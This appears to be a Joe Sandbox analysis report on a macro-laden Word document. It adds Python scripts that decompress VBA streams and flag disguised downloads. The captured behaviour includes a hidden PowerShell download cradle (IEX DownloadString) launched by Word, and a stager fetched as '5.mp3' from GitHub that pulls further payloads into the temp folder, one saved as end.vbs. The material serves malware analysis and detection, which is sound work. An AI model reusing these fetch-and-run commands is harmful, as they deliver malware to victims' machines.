                                                                                                  Stream Path:Macros/VBA/__SRP_4
                                                                                                  File Type:data
                                                                                                  Stream Size:347
                                                                                                  Entropy:2.16838987833
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . g . . . . . g . 2 . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . . . { . . . . . . . . . . . 8 . @ . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 01 00 01 00 02 00 00 00 21 0b 00 00 00 00 00 00 00 00 00 00 f1 08 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 156
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_5
                                                                                                  File Type:data
                                                                                                  Stream Size:156
                                                                                                  Entropy:1.58115335118
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 568
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/dir
                                                                                                  File Type:data
                                                                                                  Stream Size:568
                                                                                                  Entropy:6.29850563159
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . z c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                                                  Data Raw:01 34 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 81 d1 7a 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                  Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:WordDocument
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:1.46842568754
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j z y z y . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 b . . 6 b G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:ec a5 c1 00 5f 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8e 08 00 00 0e 00 62 6a 62 6a 7a 79 7a 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 18 13 36 62 18 13 36 62 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
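
The Macros/VBA/dir stream listed above (568 bytes, entropy 6.3, tagged "Base64 Encoded: True" by the sandbox heuristic) is not Base64. Per MS-OVBA the dir stream is a CompressedContainer: its first bytes 01 34 b2 are the 0x01 container signature followed by the little-endian chunk header 0xB234, which decodes to compressed flag set, signature 0b011 and a chunk size of 0x234 + 3 = 567 bytes, so one chunk plus the signature byte accounts for all 568 bytes of the stream. The readable runs in the ASCII dump ("Project", "stdole", "OLEAutomation", the stdole2.tlb path) are literal tokens sitting between copy tokens. The decompressor below is an added example and not part of the Joe Sandbox report; it parses the dir stream header from the listing and, because only the first 128 bytes of the real stream are printed, runs the full algorithm on a hand-built two-chunk container constructed for this example.

```python
import struct

# First three bytes of the Macros/VBA/dir stream dumped above: the 0x01
# CompressedContainer signature followed by the little-endian chunk header.
DIR_STREAM_HEAD = bytes.fromhex("01 34 b2")
DIR_STREAM_SIZE = 568  # "Stream Size: 568" from the listing


def parse_chunk_header(header: int) -> dict:
    """Split a 16-bit MS-OVBA CompressedChunkHeader into its fields."""
    return {
        "chunk_size": (header & 0x0FFF) + 3,   # whole chunk incl. this 2-byte header
        "signature": (header >> 12) & 0x7,     # must be 0b011
        "compressed": bool(header >> 15),      # 0 = raw 4096-byte chunk
    }


def decompress_container(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (section 2.4.1 of the spec)."""
    if not data or data[0] != 0x01:
        raise ValueError("missing 0x01 CompressedContainer signature")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        info = parse_chunk_header(struct.unpack_from("<H", data, pos)[0])
        if info["signature"] != 0b011:
            raise ValueError(f"bad chunk signature at offset {pos}")
        chunk_end = min(pos + info["chunk_size"], len(data))
        pos += 2
        chunk_out_start = len(out)         # copy tokens are relative to this chunk
        if not info["compressed"]:
            out += data[pos:pos + 4096]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = data[pos]              # one bit per token, LSB first
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(data[pos])  # literal token: one plain byte
                    pos += 1
                    continue
                token = struct.unpack_from("<H", data, pos)[0]   # copy token
                pos += 2
                produced = len(out) - chunk_out_start
                if produced == 0:
                    raise ValueError("copy token before any literal in chunk")
                # The length/offset split widens as more of the chunk is decoded:
                # bit_count = max(ceil(log2(produced)), 4).
                bit_count = max((produced - 1).bit_length(), 4)
                length_mask = 0xFFFF >> bit_count
                length = (token & length_mask) + 3
                offset = ((token & ~length_mask & 0xFFFF) >> (16 - bit_count)) + 1
                if offset > produced:
                    raise ValueError("copy offset reaches before chunk start")
                for _ in range(length):    # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


# Constructed container (not from the sample): two compressed chunks, hand-encoded
# to exercise literals, an overlapping copy (offset 3, length 9) and a 5-bit offset.
SAMPLE = bytes.fromhex(
    "01"                                  # container signature
    "05b0" "08" "616263" "0620"           # chunk 1: "abc" + copy(off=3, len=9)
    "18b0" "00" "3031323334353637"        # chunk 2: 8 literals "01234567"
    "00" "3839414243444546"               #          8 literals "89ABCDEF"
    "10" "4748494a" "0298"                #          "GHIJ" + copy(off=20, len=5)
)


def dir_stream_layout() -> dict:
    """Interpret the dir stream header from the listing above."""
    info = parse_chunk_header(struct.unpack_from("<H", DIR_STREAM_HEAD, 1)[0])
    info["matches_stream_size"] = 1 + info["chunk_size"] == DIR_STREAM_SIZE
    return info


if __name__ == "__main__":
    print(dir_stream_layout())
    print(decompress_container(SAMPLE))
```

Feed the full dir stream (extracted with any OLE reader) to decompress_container and the result is the MS-OVBA dir records: project name, the stdole and Office type library references, and the module names and stream offsets that the VBA_PROJECT and module streams are then resolved through. The same routine decompresses the module source streams, which is how the suspicious strings listed in the report's signatures are recovered from the binary.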

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID  Message                                                       Source Port  Dest Port  Source IP  Dest IP
11/04/21-02:10:34.051455  UDP       254  DNS SPOOF query response with TTL of 1 min. and no authority  53           52167      8.8.8.8    192.168.2.22
11/04/21-02:10:34.130259  UDP       254  DNS SPOOF query response with TTL of 1 min. and no authority  53           50591      8.8.8.8    192.168.2.22

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 4, 2021 02:10:34.063070059 CET  49167        80         192.168.2.22     140.82.121.4
Nov 4, 2021 02:10:34.081017971 CET  80           49167      140.82.121.4     192.168.2.22
Nov 4, 2021 02:10:34.081187010 CET  49167        80         192.168.2.22     140.82.121.4
Nov 4, 2021 02:10:34.083396912 CET  49167        80         192.168.2.22     140.82.121.4
Nov 4, 2021 02:10:34.100747108 CET  80           49167      140.82.121.4     192.168.2.22
Nov 4, 2021 02:10:34.130961895 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.131009102 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.131072998 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.143836975 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.143870115 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.189742088 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.189830065 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.203891039 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.203916073 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.204235077 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.305481911 CET  49167        80         192.168.2.22     140.82.121.4
Nov 4, 2021 02:10:34.399089098 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.504657030 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.544878960 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.645627975 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.645741940 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.645806074 CET  443          49168      140.82.121.3     192.168.2.22
Nov 4, 2021 02:10:34.645808935 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.645854950 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.649609089 CET  49168        443        192.168.2.22     140.82.121.3
Nov 4, 2021 02:10:34.677000999 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.677047968 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:34.677129030 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.677684069 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.677695990 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:34.725320101 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:34.725465059 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.737406015 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.737427950 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:34.737721920 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:34.753221035 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:34.800863981 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:35.077357054 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:35.077450037 CET  443          49169      185.199.108.133  192.168.2.22
Nov 4, 2021 02:10:35.077519894 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:35.078119993 CET  49169        443        192.168.2.22     185.199.108.133
Nov 4, 2021 02:10:36.847913027 CET  49167        80         192.168.2.22     140.82.121.4

UDP Packets

Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Nov 4, 2021 02:10:34.029695988 CET  52167        53         192.168.2.22  8.8.8.8
Nov 4, 2021 02:10:34.051455021 CET  53           52167      8.8.8.8       192.168.2.22
Nov 4, 2021 02:10:34.108933926 CET  50591        53         192.168.2.22  8.8.8.8
Nov 4, 2021 02:10:34.130259037 CET  53           50591      8.8.8.8       192.168.2.22
Nov 4, 2021 02:10:34.657147884 CET  57805        53         192.168.2.22  8.8.8.8
Nov 4, 2021 02:10:34.676018953 CET  53           57805      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                           Source IP     Dest IP  Trans ID  OP Code             Name                       Type            Class
Nov 4, 2021 02:10:34.029695988 CET  192.168.2.22  8.8.8.8  0x68c2    Standard query (0)  github.com                 A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.108933926 CET  192.168.2.22  8.8.8.8  0x90be    Standard query (0)  github.com                 A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.657147884 CET  192.168.2.22  8.8.8.8  0x9bfa    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name                       CName  Address          Type            Class
Nov 4, 2021 02:10:34.051455021 CET  8.8.8.8    192.168.2.22  0x68c2    No error (0)  github.com                 -      140.82.121.4     A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.130259037 CET  8.8.8.8    192.168.2.22  0x90be    No error (0)  github.com                 -      140.82.121.3     A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.676018953 CET  8.8.8.8    192.168.2.22  0x9bfa    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.676018953 CET  8.8.8.8    192.168.2.22  0x9bfa    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.676018953 CET  8.8.8.8    192.168.2.22  0x9bfa    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)
Nov 4, 2021 02:10:34.676018953 CET  8.8.8.8    192.168.2.22  0x9bfa    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• github.com
• raw.githubusercontent.com

HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49168        140.82.121.3    443               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp  kBytes transferred  Direction  Data
(TLS session, no cleartext payload; the decrypted exchange is listed under HTTPS Proxied Packets, session 0)

Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
1           192.168.2.22  49169        185.199.108.133  443               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp  kBytes transferred  Direction  Data
(TLS session, no cleartext payload; the decrypted exchange is listed under HTTPS Proxied Packets, session 1)

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
2           192.168.2.22  49167        140.82.121.4    80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                           kBytes transferred  Direction  Data
Nov 4, 2021 02:10:34.083396912 CET  0                   OUT        GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                                   Host: github.com
                                                                   Connection: Keep-Alive
Nov 4, 2021 02:10:34.100747108 CET  0                   IN         HTTP/1.1 301 Moved Permanently
                                                                   Content-Length: 0
                                                                   Location: https://github.com/ssbb36/stv/raw/main/5.mp3

HTTPS Proxied Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49168        140.82.121.3    443               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                kBytes transferred  Direction  Data
2021-11-04 01:10:34 UTC  0                   OUT        GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                        Host: github.com
                                                        Connection: Keep-Alive
2021-11-04 01:10:34 UTC  0                   IN         HTTP/1.1 302 Found
                                                        Server: GitHub.com
                                                        Date: Thu, 04 Nov 2021 01:10:34 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Vary: X-PJAX, X-PJAX-Container, Accept-Encoding, Accept, X-Requested-With
                                                        permissions-policy: interest-cohort=()
                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com https://viewscreen.githubusercontent.com https://notebooks.githubusercontent.com
                                                        Location: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
                                                        Cache-Control: no-cache
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                        X-Frame-Options: deny
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2021-11-04 01:10:34 UTC  0                   IN         Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
2021-11-04 01:10:34 UTC  2                   IN         Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 6d 61 69 6e 2f 35 2e 6d 70 33 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body>You are being <a href="https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3">redirected</a>.</body></html>

Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
1           192.168.2.22  49169        185.199.108.133  443               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                kBytes transferred  Direction  Data
2021-11-04 01:10:34 UTC  2                   OUT        GET /ssbb36/stv/main/5.mp3 HTTP/1.1
                                                        Host: raw.githubusercontent.com
                                                        Connection: Keep-Alive
2021-11-04 01:10:35 UTC  2                   IN         HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 473
                                                        Cache-Control: max-age=300
                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                        Content-Type: text/plain; charset=utf-8
                                                        ETag: "c42cd382e5da9f4f09cf49119db08f21ab927655a40c4bf6043e9fbeafdbfa36"
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: deny
                                                        X-XSS-Protection: 1; mode=block
                                                        X-GitHub-Request-Id: 575C:24AC:9E4121:A4F6C2:61832E2E
                                                        Accept-Ranges: bytes
                                                        Date: Thu, 04 Nov 2021 01:10:35 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-mxp6955-MXP
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1635988235.761606,VS0,VE308
                                                        Vary: Authorization,Accept-Encoding,Origin
                                                        Access-Control-Allow-Origin: *
                                                        X-Fastly-Request-ID: 6e4358e2e8bb980fac3dd61ca3e53413a0db6210
                                                        Expires: Thu, 04 Nov 2021 01:15:35 GMT
                                                        Source-Age: 0
2021-11-04 01:10:35 UTC  3                   IN         Data Raw: 63 64 20 24 45 6e 76 3a 54 65 6d 70 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 32 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 74 65 6d 70 35 34 36 38 35 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 31 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 65 6e 64 2e 76 62 73 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 33
                                                        Data Ascii (line breaks restored from the 0a bytes; the capture stops mid-line):
                                                        cd $Env:Temp
                                                        Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/2.mp3" -OutFile "temp54685"
                                                        Invoke-WebRequest -Uri "https://github.com/ssbb36/stv/raw/main/1.mp3" -OutFile "end.vbs"
                                                        Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/3
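
The three sessions above are one download: PowerShell requests 5.mp3 from github.com over plain HTTP (session 2) and is answered 301 to HTTPS, the HTTPS request (session 0) is answered 302 to raw.githubusercontent.com, and that host (session 1) returns 473 bytes of text/plain whose first lines are PowerShell (cd $Env:Temp, then Invoke-WebRequest ... -OutFile ...). The ".mp3" name is a disguise for a stager, which in turn fetches further ".mp3" files, one of them saved as end.vbs. Every request carries only Host and Connection headers, which is the "HTTP GET or POST without a user agent" signature in the summary. The script below is an added example and not part of the Joe Sandbox report: it replays these three request/response pairs from constructed records transcribed from the sessions, links them by Location header, and applies three checks a proxy or EDR pipeline can run without decoding the payload (script host with no User-Agent, URL extension against Content-Type, stager cmdlets in a 200 body). The rule names, the SCRIPT_HOSTS and EXPECTED_MIME tables and the record layout are assumptions of this example.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Script hosts whose outbound HTTP fetches deserve scrutiny (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# MIME prefix a benign server would return for the file extension in the URL.
EXPECTED_MIME = {".mp3": "audio/", ".png": "image/", ".jpg": "image/", ".gif": "image/"}

# Cmdlets and idioms that mark a "media file" as a stager rather than data.
SCRIPT_MARKERS = re.compile(
    r"Invoke-WebRequest|Invoke-Expression|\bIEX\b|-OutFile|DownloadFile|DownloadString"
    r"|Start-Process|\$Env:Temp|\.vbs\b|\.ps1\b",
    re.IGNORECASE,
)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed transaction records, one per request/response pair, transcribed from
# sessions 2, 0 and 1 of the report. The body of session 1 is the visible prefix of
# the 473-byte response; the capture cuts off mid-line, so the third line is omitted.
TRANSACTIONS = [
    {"id": 2, "process": PS, "status": 301,
     "url": "http://github.com/ssbb36/stv/raw/main/5.mp3",
     "req_headers": {"Host": "github.com", "Connection": "Keep-Alive"},
     "resp_headers": {"Content-Length": "0",
                      "Location": "https://github.com/ssbb36/stv/raw/main/5.mp3"},
     "body": ""},
    {"id": 0, "process": PS, "status": 302,
     "url": "https://github.com/ssbb36/stv/raw/main/5.mp3",
     "req_headers": {"Host": "github.com", "Connection": "Keep-Alive"},
     "resp_headers": {"Content-Type": "text/html; charset=utf-8",
                      "Location": "https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3"},
     "body": '<html><body>You are being <a href="https://raw.githubusercontent.com/'
             'ssbb36/stv/main/5.mp3">redirected</a>.</body></html>'},
    {"id": 1, "process": PS, "status": 200,
     "url": "https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3",
     "req_headers": {"Host": "raw.githubusercontent.com", "Connection": "Keep-Alive"},
     "resp_headers": {"Content-Type": "text/plain; charset=utf-8", "Content-Length": "473"},
     "body": 'cd $Env:Temp\n'
             'Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/2.mp3" -OutFile "temp54685"\n'
             'Invoke-WebRequest -Uri "https://github.com/ssbb36/stv/raw/main/1.mp3" -OutFile "end.vbs"\n'},
]


def header(headers, name):
    """Case-insensitive header lookup; returns "" when the header is absent."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), "")


def findings_for(tx):
    """Return the names of the rules that fire on one transaction."""
    hits = []
    proc = tx["process"].rsplit("\\", 1)[-1].lower()
    if proc in SCRIPT_HOSTS and not header(tx["req_headers"], "User-Agent"):
        hits.append("script-host-no-user-agent")
    ext = posixpath.splitext(urlsplit(tx["url"]).path)[1].lower()
    ctype = header(tx["resp_headers"], "Content-Type").lower()
    if tx["status"] == 200 and ext in EXPECTED_MIME and not ctype.startswith(EXPECTED_MIME[ext]):
        hits.append("extension-mime-mismatch")
    if tx["status"] == 200 and SCRIPT_MARKERS.search(tx["body"]):
        hits.append("script-body")
    return hits


def follow_redirects(transactions, start_url, max_hops=10):
    """Walk Location headers from start_url; returns the transaction ids visited."""
    by_url = {t["url"]: t for t in transactions}
    chain, url = [], start_url
    while url in by_url and len(chain) < max_hops:
        tx = by_url[url]
        chain.append(tx["id"])
        if not 300 <= tx["status"] < 400:
            break
        url = header(tx["resp_headers"], "Location")
    return chain


def analyze(transactions, start_url):
    """Chain the sessions and collect per-transaction findings along the chain."""
    chain = follow_redirects(transactions, start_url)
    by_id = {t["id"]: t for t in transactions}
    return {"chain": chain,
            "final_url": by_id[chain[-1]]["url"] if chain else None,
            "findings": {i: findings_for(by_id[i]) for i in chain}}


if __name__ == "__main__":
    report = analyze(TRANSACTIONS, "http://github.com/ssbb36/stv/raw/main/5.mp3")
    print("redirect chain (session ids):", report["chain"])
    print("final URL:", report["final_url"])
    for sid, hits in report["findings"].items():
        print(f"session {sid}: {', '.join(hits) or 'clean'}")
```

The chain check is what ties the three sessions to one download even though they hit three different server IPs (140.82.121.4, 140.82.121.3 and 185.199.108.133, matching the DNS answers above). The extension/MIME rule is deliberately applied only to the final 200 response: the intermediate GitHub hops legitimately answer text/html, and alerting on them would be noise.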


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Behavior

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:02:10:24
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                  Imagebase:0x13f490000
                                                                                                  File size:1423704 bytes
                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:02:10:26
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
                                                                                                  Imagebase:0x13f860000
